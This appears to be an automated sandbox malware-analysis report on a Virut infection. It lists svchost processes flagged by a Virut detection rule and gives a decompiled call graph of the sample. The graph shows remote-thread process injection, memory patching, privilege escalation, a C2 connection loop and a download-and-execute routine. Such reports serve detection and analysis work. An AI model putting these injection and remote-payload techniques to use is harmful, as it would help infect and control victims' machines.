                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.902192985.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.532376607.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:27
                  Start time:19:39:19
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.902222817.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.536806617.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:28
                  Start time:19:39:21
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000002.902193202.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000000.540275578.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:31
                  Start time:19:39:35
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Target ID:32
                  Start time:19:39:36
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:33
                  Start time:19:39:38
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.902365047.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.575671451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:34
                  Start time:19:39:39
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.577790526.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.902363987.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:35
                  Start time:19:39:41
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.581481544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.902453528.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:36
                  Start time:19:39:42
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s FontCache
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.902362977.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000000.584556975.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:37
                  Start time:19:39:44
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.588589475.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.902365996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:38
                  Start time:19:39:46
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.902444306.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.592851352.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:39
                  Start time:19:39:47
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s nsi
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.595649330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.902362984.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:40
                  Start time:19:39:49
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000000.599806801.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.902434304.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:41
                  Start time:19:39:54
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000002.902364285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000000.610017301.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:62.9%
                    Total number of Nodes:687
                    Total number of Limit Nodes:11
                    execution_graph 6523 7fea4c6b 6526 7fea4c9e 6523->6526 6527 7fea4caa 6526->6527 6534 7fea4499 6527->6534 6529 7fea4cb7 6530 7fea4499 5 API calls 6529->6530 6533 7fea4d64 6529->6533 6531 7fea4d58 6530->6531 6532 7fea4499 5 API calls 6531->6532 6531->6533 6532->6533 6535 7fea44c2 CreateFileA 6534->6535 6536 7fea44a3 GetFileAttributesA 6534->6536 6539 7fea44fc CreateFileMappingA 6535->6539 6536->6535 6537 7fea44af SetFileAttributesA 6536->6537 6537->6535 6541 7fea4573 MapViewOfFile 6539->6541 6543 7fea45a8 6541->6543 6543->6529 6707 7fea43ad 6708 7fea43b9 6707->6708 6711 7fea43dd 6708->6711 6710 7fea43c4 6714 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6711->6714 6713 7fea43e3 6713->6710 6714->6713 6593 7fea33e0 6594 7fea344e 6593->6594 6595 7fea33e5 6593->6595 6597 7fea345f NtQuerySystemInformation 6594->6597 6601 7fea35f3 6594->6601 6596 7fea346f MapViewOfFile CloseHandle 6595->6596 6598 7fea3440 NtOpenSection 6595->6598 6600 7fea34b0 6596->6600 6596->6601 6597->6596 6598->6594 6599 7fea34b7 UnmapViewOfFile 6599->6601 6600->6599 6600->6601 6879 b0663a 6882 b06647 6879->6882 6883 b06652 6882->6883 6884 b06644 6882->6884 6883->6884 6886 b06658 6883->6886 6887 b02574 5 API calls 6886->6887 6888 b0666a 6887->6888 6888->6884 7303 7fea6620 7304 7fea6647 5 API calls 7303->7304 7305 7fea662a 7304->7305 6889 b0443b 6892 b0144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6889->6892 6891 b04441 6892->6891 6715 b002fe 6716 b00415 6715->6716 6718 b0042d 6716->6718 6747 b010ce 6718->6747 6720 b0048f 6721 b004dd 6720->6721 6722 b004b0 GetModuleHandleA 6720->6722 6723 b004f8 GetVersion 6721->6723 6722->6721 6724 b0050f VirtualAlloc 6723->6724 6737 b005ca 6723->6737 6725 b005a9 FindCloseChangeNotification 6724->6725 6728 b00532 6724->6728 6725->6737 6726 b005d3 SetProcessAffinityMask 6754 b005f2 GetModuleHandleA 6726->6754 6728->6725 6751 b005ba 6728->6751 6729 b006fc lstrcpyW 6776 b024ae lstrcpyW lstrlenW 6729->6776 6731 b00717 GetPEB lstrcpyW lstrcatW 6734 b024ae 3 API calls 6731->6734 6732 b0074c NtMapViewOfSection 6732->6725 6732->6737 6734->6737 6735 b00780 NtOpenProcessToken 6736 b007c5 CreateToolhelp32Snapshot Process32First 6735->6736 6735->6737 6738 b007eb Process32Next 6736->6738 6737->6725 6737->6726 6737->6729 6737->6731 6737->6732 6737->6735 6737->6738 6741 b007fd OpenProcess 6737->6741 6743 b007b7 CreateToolhelp32Snapshot Process32First 6737->6743 6744 b0085c FindCloseChangeNotification 6737->6744 6745 b00834 CreateRemoteThread 6737->6745 6746 b005ba Sleep 6737->6746 6779 b007ac 6737->6779 6802 b02574 6737->6802 6738->6737 6739 b00865 FindCloseChangeNotification 6738->6739 6739->6725 6741->6737 6741->6738 6743->6738 6744->6738 6745->6737 6745->6744 6746->6744 6748 b010db 6747->6748 6748->6747 6749 b0115c 6748->6749 6750 b01133 GetModuleHandleA GetProcAddress 6748->6750 6749->6720 6750->6748 6752 b005c9 6751->6752 6753 b005bf Sleep 6751->6753 6752->6725 6753->6751 6755 b010ce 2 API calls 6754->6755 6768 b005ca 6755->6768 6756 b005a9 FindCloseChangeNotification 6756->6768 6757 b005d3 SetProcessAffinityMask 6758 b005f2 30 API calls 6757->6758 6758->6768 6759 b006fc lstrcpyW 6760 b024ae 3 API calls 6759->6760 6760->6768 6761 b00717 GetPEB lstrcpyW lstrcatW 6763 b024ae 3 API calls 6761->6763 6762 b0074c NtMapViewOfSection 6762->6756 6762->6768 6763->6768 6764 b00780 NtOpenProcessToken 6765 b007c5 CreateToolhelp32Snapshot Process32First 6764->6765 6764->6768 6766 b007eb Process32Next 6765->6766 6767 b00865 FindCloseChangeNotification 6766->6767 6766->6768 6767->6756 6768->6756 6768->6757 6768->6759 6768->6761 6768->6762 6768->6764 6768->6766 6769 b007ac 30 API calls 6768->6769 6770 b007fd OpenProcess 6768->6770 6771 b02574 5 API calls 6768->6771 6772 b007b7 CreateToolhelp32Snapshot Process32First 6768->6772 6773 b0085c FindCloseChangeNotification 6768->6773 6774 b00834 CreateRemoteThread 6768->6774 6775 b005ba Sleep 6768->6775 6769->6768 6770->6766 6770->6768 6771->6768 6772->6766 6773->6766 6774->6768 6774->6773 6775->6773 6821 b06c24 6776->6821 6823 b0144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6779->6823 6781 b007b2 FreeLibrary FindCloseChangeNotification 6782 b007c5 CreateToolhelp32Snapshot Process32First 6781->6782 6783 b007eb Process32Next 6782->6783 6784 b00865 FindCloseChangeNotification 6783->6784 6800 b005ca 6783->6800 6785 b005a9 FindCloseChangeNotification 6784->6785 6785->6800 6786 b007fd OpenProcess 6786->6783 6786->6800 6787 b005d3 SetProcessAffinityMask 6789 b005f2 29 API calls 6787->6789 6788 b02574 5 API calls 6788->6800 6789->6800 6790 b0085c FindCloseChangeNotification 6790->6783 6791 b00834 CreateRemoteThread 6791->6790 6791->6800 6792 b005ba Sleep 6792->6790 6793 b006fc lstrcpyW 6794 b024ae 3 API calls 6793->6794 6794->6800 6795 b00717 GetPEB lstrcpyW lstrcatW 6797 b024ae 3 API calls 6795->6797 6796 b0074c NtMapViewOfSection 6796->6785 6796->6800 6797->6800 6798 b00780 NtOpenProcessToken 6798->6782 6798->6800 6799 b007ac 29 API calls 6799->6800 6800->6783 6800->6785 6800->6786 6800->6787 6800->6788 6800->6790 6800->6791 6800->6792 6800->6793 6800->6795 6800->6796 6800->6798 6800->6799 6801 b007b7 CreateToolhelp32Snapshot Process32First 6800->6801 6801->6783 6824 b0252f NtOpenSection 6802->6824 6804 b0257c 6805 b02661 6804->6805 6806 b02582 NtMapViewOfSection FindCloseChangeNotification 6804->6806 6805->6737 6806->6805 6809 b025ba 6806->6809 6807 b025ef 6826 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6807->6826 6809->6807 6825 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6809->6825 6810 b02600 6827 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6810->6827 6813 b02611 6828 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6813->6828 6815 b02622 6816 b02637 6815->6816 6829 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6815->6829 6818 b0264c 6816->6818 6830 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6816->6830 6818->6805 6831 b02477 NtProtectVirtualMemory NtWriteVirtualMemory 6818->6831 6822 b06ccc 6821->6822 6823->6781 6824->6804 6825->6807 6826->6810 6827->6813 6828->6815 6829->6816 6830->6818 6831->6805 6893 7fea2665 6895 7fea266b CreateThread CloseHandle 6893->6895 6896 7fea3c38 6895->6896 6898 7fea3c3d 6896->6898 6899 7fea3ca9 6898->6899 6902 7fea3c5b GetWindowsDirectoryA 6898->6902 6953 7fea252f NtOpenSection 6899->6953 6901 7fea3cae 6904 7fea3cfb GetSystemDirectoryA 6901->6904 6905 7fea3cb5 6901->6905 6906 7fea3d26 6902->6906 6998 7fea3d1f lstrcat 6904->6998 6954 7fea3cc2 GetModuleHandleA 6905->6954 7040 7fea3d36 LoadLibraryA 6906->7040 6953->6901 6955 7fea3ccc 6954->6955 6956 7fea3cde 6954->6956 6958 7fea3cd4 GetProcAddress 6955->6958 7081 7fea3cf0 GetModuleHandleA 6956->7081 6958->6956 6999 7fea3d26 6998->6999 7000 7fea3d36 151 API calls 6999->7000 7001 7fea3d2b GetProcAddress LoadLibraryA 7000->7001 7003 7fea3d7d 7001->7003 7004 7fea10ce 2 API calls 7001->7004 7005 7fea3d92 GetTickCount 7003->7005 7004->7003 7006 7fea3daa 7005->7006 7007 7fea3e47 GetVolumeInformationA 7006->7007 7008 7fea3e7a 7007->7008 7009 7fea3f25 7008->7009 7010 7fea3eb5 96 API calls 7008->7010 7012 7fea3f4f 7009->7012 7013 7fea3f31 CreateThread CloseHandle 7009->7013 7011 7fea3ea9 7010->7011 7011->7009 7016 7fea3eca GetModuleFileNameA wsprintfA 7011->7016 7014 7fea3f60 43 API calls 7012->7014 7013->7012 7015 7fea3f54 7014->7015 7017 7fea3f7e 7015->7017 7018 7fea10ce 2 API calls 7015->7018 7020 7fea3f14 7016->7020 7019 7fea3f8f 23 API calls 7017->7019 7018->7017 7021 7fea3f83 7019->7021 7020->7009 7023 7fea3405 5 API calls 7020->7023 7022 7fea3fd6 CreateThread CloseHandle 7021->7022 7024 7fea3ffa CreateEventA 7021->7024 7022->7024 7023->7009 7037 7fea4012 7024->7037 7025 7fea4056 lstrlen 7025->7025 7026 7fea4065 gethostbyname 7025->7026 7026->7037 7027 7fea4320 RtlExitUserThread 7028 7fea4081 socket 7030 7fea40a6 connect 7028->7030 7028->7037 7029 7fea42d0 SetEvent 7029->7037 7032 7fea42b7 closesocket 7030->7032 7030->7037 7031 7fea42f2 Sleep ResetEvent 7031->7037 7032->7037 7033 7fea40ef GetVersionExA 7033->7037 7034 7fea4172 wsprintfA 7034->7037 7035 7fea41a7 CreateThread CloseHandle 7035->7037 7036 7fea41f6 GetTickCount 7036->7037 7037->7025 7037->7026 7037->7027 7037->7028 7037->7029 7037->7031 7037->7032 7037->7033 7037->7034 7037->7035 7037->7036 7038 7fea4288 Sleep 7037->7038 7038->7037 7039 7fea4294 GetTickCount 7038->7039 7039->7037 7239 7fea3d4b GetProcAddress LoadLibraryA 7040->7239 7124 7fea26d4 7081->7124 7084 7fea3d1f 179 API calls 7085 7fea3d12 GetProcAddress LoadLibraryA 7084->7085 7087 7fea3d7d 7085->7087 7088 7fea10ce 2 API calls 7085->7088 7089 7fea3d92 GetTickCount 7087->7089 7088->7087 7090 7fea3daa 7089->7090 7091 7fea3e47 GetVolumeInformationA 7090->7091 7092 7fea3e7a 7091->7092 7093 7fea3f25 7092->7093 7126 7fea3eb5 LoadLibraryA 7092->7126 7096 7fea3f4f 7093->7096 7097 7fea3f31 CreateThread CloseHandle 7093->7097 7158 7fea3f60 LoadLibraryA 7096->7158 7097->7096 7125 7fea26c8 GetSystemDirectoryA 7124->7125 7125->7084 7180 7fea3ecc GetProcAddress GetModuleFileNameA wsprintfA 7126->7180 7159 7fea10ce 2 API calls 7158->7159 7160 7fea3f7e 7159->7160 7161 7fea3f8f 23 API calls 7160->7161 7162 7fea3f83 7161->7162 7163 7fea3fd6 CreateThread CloseHandle 7162->7163 7164 7fea3ffa CreateEventA 7162->7164 7163->7164 7167 7fea4012 7164->7167 7165 7fea4056 lstrlen 7165->7165 7166 7fea4065 gethostbyname 7165->7166 7166->7167 7167->7165 7167->7166 7168 7fea4320 RtlExitUserThread 7167->7168 7169 7fea4081 socket 7167->7169 7170 7fea42d0 SetEvent 7167->7170 7172 7fea42f2 Sleep ResetEvent 7167->7172 7173 7fea42b7 closesocket 7167->7173 7174 7fea40ef GetVersionExA 7167->7174 7175 7fea4172 wsprintfA 7167->7175 7176 7fea41a7 CreateThread CloseHandle 7167->7176 7177 7fea41f6 GetTickCount 7167->7177 7178 7fea4288 Sleep 7167->7178 7169->7167 7171 7fea40a6 connect 7169->7171 7170->7167 7171->7167 7171->7173 7172->7167 7173->7167 7174->7167 7175->7167 7176->7167 7177->7167 7178->7167 7179 7fea4294 GetTickCount 7178->7179 7179->7167 7181 7fea3f14 7180->7181 7182 7fea3f25 7181->7182 7209 7fea3405 7181->7209 7184 7fea3f4f 7182->7184 7185 7fea3f31 CreateThread CloseHandle 7182->7185 7186 7fea3f60 43 API calls 7184->7186 7185->7184 7187 7fea3f54 7186->7187 7188 7fea3f7e 7187->7188 7189 7fea10ce 2 API calls 7187->7189 7218 7fea3f8f LoadLibraryA 7188->7218 7189->7188 7210 7fea343b 7209->7210 7210->7210 7211 7fea3440 NtOpenSection 7210->7211 7212 7fea344e 7211->7212 7213 7fea345f NtQuerySystemInformation 7212->7213 7217 7fea35f3 7212->7217 7214 7fea346f MapViewOfFile CloseHandle 7213->7214 7216 7fea34b0 7214->7216 7214->7217 7215 7fea34b7 UnmapViewOfFile 7215->7217 7216->7215 7216->7217 7217->7182 7219 7fea3f9d 7218->7219 7220 7fea4320 RtlExitUserThread 7218->7220 7221 7fea10ce 2 API calls 7219->7221 7222 7fea3fb5 7221->7222 7222->7220 7223 7fea3fc2 WSAStartup CreateThread CloseHandle 7222->7223 7224 7fea3ffa CreateEventA 7223->7224 7236 7fea4012 7224->7236 7225 7fea4056 lstrlen 7225->7225 7226 7fea4065 gethostbyname 7225->7226 7226->7236 7227 7fea4081 socket 7229 7fea40a6 connect 7227->7229 7227->7236 7228 7fea42d0 SetEvent 7228->7236 7231 7fea42b7 closesocket 7229->7231 7229->7236 7230 7fea42f2 Sleep ResetEvent 7230->7236 7231->7236 7232 7fea40ef GetVersionExA 7232->7236 7233 7fea4172 wsprintfA 7233->7236 7234 7fea41a7 CreateThread CloseHandle 7234->7236 7235 7fea41f6 GetTickCount 7235->7236 7236->7220 7236->7225 7236->7226 7236->7227 7236->7228 7236->7230 7236->7231 7236->7232 7236->7233 7236->7234 7236->7235 7237 7fea4288 Sleep 7236->7237 7237->7236 7238 7fea4294 GetTickCount 7237->7238 7238->7236 7240 7fea10ce 2 API calls 7239->7240 7241 7fea3d7d 7240->7241 7242 7fea3d92 GetTickCount 7241->7242 7243 7fea3daa 7242->7243 7244 7fea3e47 GetVolumeInformationA 7243->7244 7245 7fea3e7a 7244->7245 7246 7fea3f25 7245->7246 7247 7fea3eb5 96 API calls 7245->7247 7249 7fea3f4f 7246->7249 7250 7fea3f31 CreateThread CloseHandle 7246->7250 7248 7fea3ea9 7247->7248 7248->7246 7253 7fea3eca GetModuleFileNameA wsprintfA 7248->7253 7251 7fea3f60 43 API calls 7249->7251 7250->7249 7252 7fea3f54 7251->7252 7254 7fea3f7e 7252->7254 7255 7fea10ce 2 API calls 7252->7255 7257 7fea3f14 7253->7257 7256 7fea3f8f 23 API calls 7254->7256 7255->7254 7258 7fea3f83 7256->7258 7257->7246 7260 7fea3405 5 API calls 7257->7260 7259 7fea3fd6 CreateThread CloseHandle 7258->7259 7261 7fea3ffa CreateEventA 7258->7261 7259->7261 7260->7246 7274 7fea4012 7261->7274 7262 7fea4056 lstrlen 7262->7262 7263 7fea4065 gethostbyname 7262->7263 7263->7274 7264 7fea4320 RtlExitUserThread 7265 7fea4081 socket 7267 7fea40a6 connect 7265->7267 7265->7274 7266 7fea42d0 SetEvent 7266->7274 7269 7fea42b7 closesocket 7267->7269 7267->7274 7268 7fea42f2 Sleep ResetEvent 7268->7274 7269->7274 7270 7fea40ef GetVersionExA 7270->7274 7271 7fea4172 wsprintfA 7271->7274 7272 7fea41a7 CreateThread CloseHandle 7272->7274 7273 7fea41f6 GetTickCount 7273->7274 7274->7262 7274->7263 7274->7264 7274->7265 7274->7266 7274->7268 7274->7269 7274->7270 7274->7271 7274->7272 7274->7273 7275 7fea4288 Sleep 7274->7275 7275->7274 7276 7fea4294 GetTickCount 7275->7276 7276->7274 6486 7fea663a 6489 7fea6647 6486->6489 6490 7fea6644 6489->6490 6491 7fea6652 6489->6491 6493 7fea6658 6491->6493 6496 7fea2574 6493->6496 6515 7fea252f NtOpenSection 6496->6515 6498 7fea257c 6499 7fea2582 NtMapViewOfSection CloseHandle 6498->6499 6500 7fea2661 6498->6500 6499->6500 6502 7fea25ba 6499->6502 6500->6490 6501 7fea25ef 6517 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6501->6517 6502->6501 6516 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6502->6516 6505 7fea2600 6518 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6505->6518 6507 7fea2611 6519 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6507->6519 6509 7fea2622 6510 7fea2637 6509->6510 6520 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6509->6520 6512 7fea264c 6510->6512 6521 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6510->6521 6512->6500 6522 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6512->6522 6515->6498 6516->6501 6517->6505 6518->6507 6519->6509 6520->6510 6521->6512 6522->6500 6832 b033e0 6833 b033e5 6832->6833 6834 b0346f MapViewOfFile CloseHandle 6833->6834 6836 b03440 NtOpenSection 6833->6836 6838 b034b0 6834->6838 6839 b035f3 6834->6839 6835 b034b7 UnmapViewOfFile 6835->6839 6837 b0345f NtQuerySystemInformation 6836->6837 6836->6839 6837->6834 6838->6835 6838->6839 7277 b06620 7278 b06647 5 API calls 7277->7278 7279 b0662a 7278->7279 7306 7fea443b 7309 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 7306->7309 7308 7fea4441 7309->7308 7280 b01422 LookupPrivilegeValueA NtAdjustPrivilegesToken 7310 b02762 7312 b02768 7310->7312 7313 b02780 GetTempPathA 7312->7313 7314 b02839 InternetCloseHandle 7312->7314 7322 b027a7 GetTempFileNameA CreateFileA 7313->7322 7316 b027a3 CreateFileA 7317 b02829 InternetCloseHandle 7316->7317 7318 b027ce InternetReadFile 7316->7318 7317->7314 7319 b027e8 7318->7319 7320 b027fe CloseHandle CreateProcessA 7318->7320 7319->7320 7321 b027ea WriteFile 7319->7321 7320->7317 7321->7318 7321->7320 7323 b02829 InternetCloseHandle 7322->7323 7324 b027ce InternetReadFile 7322->7324 7325 b02839 InternetCloseHandle 7323->7325 7326 b027e8 7324->7326 7327 b027fe CloseHandle CreateProcessA 7324->7327 7325->7316 7326->7327 7328 b027ea WriteFile 7326->7328 7327->7323 7328->7324 7328->7327 6602 7fea02fe 6603 7fea0415 6602->6603 6605 7fea042d 6603->6605 6636 7fea10ce 6605->6636 6607 7fea048f 6608 7fea04dd 6607->6608 6609 7fea04b0 GetModuleHandleA 6607->6609 6610 7fea04f8 GetVersion 6608->6610 6609->6608 6611 7fea05ca 6610->6611 6612 7fea050f VirtualAlloc 6610->6612 6613 7fea05a9 CloseHandle 6611->6613 6614 7fea05d3 SetProcessAffinityMask 6611->6614 6612->6613 6618 7fea0532 6612->6618 6616 7fea05f2 GetModuleHandleA 6613->6616 6643 7fea05f2 GetModuleHandleA 6614->6643 6617 7fea10ce 2 API calls 6616->6617 6634 7fea05ec 6617->6634 6618->6613 6640 7fea05ba 6618->6640 6619 7fea06fc lstrcpyW 6662 7fea24ae lstrcpyW lstrlenW 6619->6662 6621 7fea074c NtMapViewOfSection 6621->6613 6621->6634 6622 7fea0717 GetPEB lstrcpyW lstrcatW 6624 7fea24ae 3 API calls 6622->6624 6624->6634 6625 7fea0780 NtOpenProcessToken 6626 7fea07c5 CreateToolhelp32Snapshot Process32First 6625->6626 6625->6634 6626->6634 6627 7fea07eb Process32Next 6630 7fea0865 CloseHandle 6627->6630 6627->6634 6628 7fea2574 5 API calls 6628->6634 6630->6613 6631 7fea07fd OpenProcess 6631->6627 6631->6634 6632 7fea085c CloseHandle 6632->6627 6633 7fea0834 CreateRemoteThread 6633->6632 